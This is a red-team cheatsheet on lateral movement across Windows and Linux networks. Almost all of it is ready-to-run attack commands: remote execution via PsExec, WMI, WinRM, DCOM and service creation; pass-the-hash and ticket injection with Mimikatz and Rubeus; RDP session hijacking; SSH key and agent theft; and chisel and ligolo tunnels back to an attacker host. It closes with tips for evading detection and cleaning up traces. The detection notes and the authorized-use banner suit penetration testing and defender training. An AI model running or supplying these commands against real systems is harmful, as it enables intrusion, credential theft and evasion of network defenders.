LATERAL-MOVEMENT
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
Lateral movement is the process of moving through a network after initial compromise to access additional systems and data. This cheatsheet covers Windows and Linux techniques with practical commands for red team operations.
WINDOWS LATERAL MOVEMENT#
PSEXEC#
Uses SMB (TCP 445) to upload a service binary and execute it remotely. Requires local admin on the target. # Sysinternals PsExec psexec.exe \\TARGET -u DOMAIN\user -p password cmd.exe # Impacket psexec (creates a service, uploads binary) psexec.py DOMAIN/user:password@TARGET psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET # Impacket smbexec (no binary upload, uses cmd.exe output redirect) smbexec.py DOMAIN/user:password@TARGET # Metasploit use exploit/windows/smb/psexec set SMBUser user set SMBPass password Detection: Service creation (Event 7045), SMB file write, process lineage
WMI (WINDOWS MANAGEMENT INSTRUMENTATION)#
Uses DCOM (TCP 135 + dynamic ports). Does not write to disk by default.
Requires local admin on the target.
# wmic command
wmic /node:TARGET /user:DOMAIN\user /password:pass process call create "cmd.exe /c whoami > C:\output.txt"
# Impacket wmiexec (semi-interactive shell via WMI)
wmiexec.py DOMAIN/user:password@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
# PowerShell WMI
Invoke-WmiMethod -ComputerName TARGET -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c payload.exe" -Credential $cred
# CIM (modern replacement for WMI)
Invoke-CimMethod -ComputerName TARGET -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="payload.exe"} -Credential $cred
Detection: WMI event logs (5857-5861), process creation with WmiPrvSE.exe parent
WINRM (WINDOWS REMOTE MANAGEMENT)#
Uses HTTP (TCP 5985) or HTTPS (TCP 5986). Native Windows remote management.
Requires membership in Remote Management Users or local admin.
# PowerShell Remoting
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user
Invoke-Command -ComputerName TARGET -ScriptBlock {whoami} -Credential $cred
Invoke-Command -ComputerName TARGET -FilePath C:\local\script.ps1
# Evil-WinRM (supports hash, key auth, file operations)
evil-winrm -i TARGET -u user -p password
evil-winrm -i TARGET -u user -H NTLM_HASH
evil-winrm -i TARGET -u user -k # Kerberos auth
# CrackMapExec
crackmapexec winrm TARGET -u user -p password -x "whoami"
Detection: Event 4624 (Type 3), Event 91 (WSMan), PowerShell script block logging
DCOM (DISTRIBUTED COMPONENT OBJECT MODEL)#
Uses TCP 135 + dynamic ports. Various COM objects can execute commands.
Requires local admin on the target.
# Impacket dcomexec
dcomexec.py DOMAIN/user:password@TARGET
dcomexec.py -object MMC20 DOMAIN/user:password@TARGET
# PowerShell - MMC20.Application
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c payload.exe","7")
# PowerShell - ShellWindows
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET"))
$com.item().Document.Application.ShellExecute("cmd.exe","/c payload.exe","C:\Windows\System32",$null,0)
Detection: DCOM event logs, unusual parent process (mmc.exe, explorer.exe)
RDP (REMOTE DESKTOP PROTOCOL)#
Uses TCP 3389. Interactive GUI access. Most "legitimate-looking" lateral movement. # Standard RDP xfreerdp /u:user /p:password /v:TARGET /dynamic-resolution mstsc.exe /v:TARGET # RDP Hijacking (requires SYSTEM privileges) # List sessions query user /server:TARGET # Hijack disconnected session (no password needed if SYSTEM) tscon <SESSION_ID> /dest:rdp-tcp#0 # SharpRDP (authenticated command execution over RDP) SharpRDP.exe computername=TARGET command="cmd /c payload.exe" username=DOMAIN\user password=pass # Restricted Admin Mode (pass-the-hash over RDP) # Must be enabled on target reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 sekurlsa::pth /user:admin /domain:TARGET /ntlm:HASH "/run:mstsc.exe /restrictedadmin" Detection: Event 4624 (Type 10), Event 1149 (RDP connect), network traffic
SCHEDULED TASKS#
Uses RPC/DCOM. Creates a scheduled task remotely for execution. # schtasks schtasks /create /s TARGET /u DOMAIN\user /p password /tn "Update" /tr "C:\payload.exe" /sc once /st 00:00 /ru SYSTEM schtasks /run /s TARGET /tn "Update" schtasks /delete /s TARGET /tn "Update" /f # Impacket atexec atexec.py DOMAIN/user:password@TARGET "whoami" Detection: Event 4698 (task created), Event 4702 (task updated), process lineage
SERVICE CREATION#
Uses SMB (TCP 445) and SCM. Creates/modifies a Windows service remotely.
# sc.exe
sc \\TARGET create SvcName binPath= "C:\payload.exe" start= auto
sc \\TARGET start SvcName
sc \\TARGET delete SvcName
# PowerShell
Invoke-Command -ComputerName TARGET -ScriptBlock {New-Service -Name SvcName -BinaryPathName "C:\payload.exe"}
Detection: Event 7045 (service installed), Event 4697, process lineage
PASS-THE-HASH (PTH)#
Use NTLM hash directly for authentication without knowing the plaintext password. Only works with NTLM authentication (not Kerberos). # Impacket psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET # CrackMapExec crackmapexec smb TARGET -u user -H NTLM_HASH crackmapexec smb TARGET -u user -H NTLM_HASH -x "whoami" # Mimikatz (spawn process with alternate credentials) sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:cmd.exe # Evil-WinRM evil-winrm -i TARGET -u user -H NTLM_HASH Detection: Event 4624 (Type 3, NtLmSsp), unusual NTLM auth patterns
PASS-THE-TICKET (PTT)#
Inject a stolen Kerberos ticket into the current session. # Mimikatz - export tickets sekurlsa::tickets /export # Inject ticket kerberos::ptt ticket.kirbi # Rubeus Rubeus.exe ptt /ticket:ticket.kirbi Rubeus.exe ptt /ticket:base64_ticket # Linux (ccache format) export KRB5CCNAME=/path/to/ticket.ccache psexec.py -k -no-pass DOMAIN/user@TARGET Detection: Event 4768/4769 anomalies, TGT reuse from different IPs
OVERPASS-THE-HASH#
Use NTLM hash to request a Kerberos TGT, then use Kerberos auth. Avoids NTLM-based detection. # Mimikatz sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe # Then in the new shell, Kerberos tickets are automatically requested # Rubeus Rubeus.exe asktgt /user:user /rc4:NTLM_HASH /ptt Rubeus.exe asktgt /user:user /aes256:AES_KEY /ptt /opsec Detection: Event 4768 (RC4 encryption, unusual source)
TOKEN IMPERSONATION#
Steal or impersonate tokens from other processes for privilege escalation or lateral movement. # Cobalt Strike beacon> steal_token <PID> beacon> make_token DOMAIN\user password beacon> rev2self # Metasploit Incognito meterpreter> use incognito meterpreter> list_tokens -u meterpreter> impersonate_token "DOMAIN\\user" # Windows native # Requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege Detection: Event 4624 (Type 9 NewCredentials), token-related API calls
LINUX LATERAL MOVEMENT#
SSH#
# Standard SSH ssh user@TARGET ssh -i id_rsa user@TARGET # SSH with password (sshpass) sshpass -p 'password' ssh user@TARGET # SSH key theft and reuse find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null cat /home/*/.ssh/authorized_keys cat /home/*/.ssh/known_hosts # discover additional targets # SSH agent forwarding hijack # Find SSH agent sockets find /tmp -name "agent.*" 2>/dev/null SSH_AUTH_SOCK=/tmp/ssh-XXXXX/agent.YYYY ssh user@TARGET
SSH TUNNELING#
# Local port forward (access TARGET:PORT through SSH host) ssh -L LOCAL_PORT:TARGET:REMOTE_PORT user@PIVOT_HOST # Remote port forward (expose local service through SSH host) ssh -R REMOTE_PORT:127.0.0.1:LOCAL_PORT user@PIVOT_HOST # Dynamic SOCKS proxy ssh -D 1080 user@PIVOT_HOST # Then configure proxychains: socks5 127.0.0.1 1080 # SSH over SSH (multi-hop) ssh -J user@PIVOT1 user@TARGET ssh -o ProxyCommand="ssh -W %h:%p user@PIVOT1" user@TARGET
PROXYCHAINS#
# Configure /etc/proxychains4.conf # socks5 127.0.0.1 1080 # Run tools through proxy proxychains nmap -sT -Pn TARGET proxychains crackmapexec smb TARGET -u user -p pass proxychains evil-winrm -i TARGET -u user -p pass
SOCAT#
# Port forwarding socat TCP-LISTEN:8080,fork TCP:TARGET:80 # Encrypted relay socat TCP-LISTEN:443,reuseaddr,fork OPENSSL:TARGET:443,verify=0 # Bidirectional relay socat TCP-LISTEN:1234,fork TCP:TARGET:4321
CHISEL#
# Server (attacker) chisel server --reverse --port 8080 # Client (pivot host) chisel client ATTACKER:8080 R:socks # Reverse port forward chisel client ATTACKER:8080 R:9090:TARGET:80
LIGOLO-NG#
# Proxy (attacker) ligolo-proxy -selfcert -laddr 0.0.0.0:11601 # Agent (pivot host) ligolo-agent -connect ATTACKER:11601 -ignore-cert # Add route on attacker sudo ip route add 10.10.0.0/24 dev ligolo # Start tunnel ligolo> session ligolo> start
OPSEC CONSIDERATIONS#
- WMI and DCOM are less noisy than PsExec (no file write) - Use Kerberos over NTLM when possible (blends with normal traffic) - Overpass-the-hash avoids NTLM monitoring - RDP leaves fewer forensic artifacts than remote execution - Clean up scheduled tasks and services after use - Use encrypted channels for pivoting (SSH, Chisel, Ligolo) - Avoid scanning entire subnets; target specific hosts - Use native protocols matching the target environment - Monitor your own artifacts and clean up on exit